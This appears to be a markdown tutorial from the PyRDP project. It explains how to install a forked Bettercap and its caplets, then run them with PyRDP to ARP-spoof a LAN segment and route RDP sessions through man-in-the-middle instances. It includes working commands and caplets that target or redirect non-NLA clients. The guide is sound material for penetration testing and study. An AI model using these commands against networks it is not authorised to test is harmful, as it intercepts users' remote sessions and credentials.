Skip to content

Latest commit

 

History

History
70 lines (48 loc) · 2.52 KB

bettercap-rdp-mitm.md

File metadata and controls

70 lines (48 loc) · 2.52 KB

Run PyRDP alongisde Bettercap

Here is a short tutorial on how to combine the PyRDP and Bettercap to redirect all RDP sessions on a LAN segment. By default, Bettercap's arp spoofing module will spoof the entire subnet over a given interface. We will spawn an instance of PyRDP for each incoming RDP connections if they are in our target list, otherwise we will forward them.

Requirements

  1. PyRDP
  2. Our fork and branch of Bettercap
  3. Our fork of Caplets

Setup

Install PyRDP by following these steps : https://github.com/GoSecure/pyrdp#installing

Install Bettercap by running these commands :

sudo apt-get update
sudo apt-get install build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
mkdir -p $GOPATH/src/github.com/bettercap/
cd $GOPATH/src/github.com/bettercap/
git clone https://github.com/GoSecure/bettercap.git -b rdp-mitm
cd bettercap
go get
go build
make build && sudo make install

Install Caplets by running these commands :

mkdir -p ~/src/
cd ~/src/
git clone https://github.com/GoSecure/caplets.git
cd caplets
sudo make install

Usage

Assuming that you installed PyRDP using a venv, you need to activate your PyRDP virtual environment:

source venv/bin/activate

Start bettercap with :

sudo bettercap -iface <interface> -caplet <caplet> -eval "set rdp.proxy.command $(which pyrdp-mitm.py)"

Basic example :

sudo bettercap -iface wlp2s0 -caplet rdp-proxy/rdp-sniffer.cap -eval "set rdp.proxy.command $(which pyrdp-mitm.py)"

Caplets

Caplets are basically a way to script bettercap's configuration. You can also use a caplet to better understand how to use a module. You may modify a caplet to fine-tune the module, but you will need to reinstall it with sudo make install to apply the modifications.

We currently have 2 caplets. Read each caplet's source for further documentation and usage. Here's a quick rundown :

rdp-proxy/rdp-sniffer.cap
The default caplet. Forwards every target to a PyRDP instance if they have disabled NLA.
rdp-proxy/rdp-sniffer-nla-redirect.cap
Will forward every target to a PyRDP instance if they have disabled NLA. Otherwise, redirect the client to a user-defined non-NLA host.
Requires some configuration inside the caplet at ~/src/caplets/rdp-proxy/rdp-sniffer-nla-redirect.cap
Don't forget to `sudo make install` after editing the caplet.

Have fun!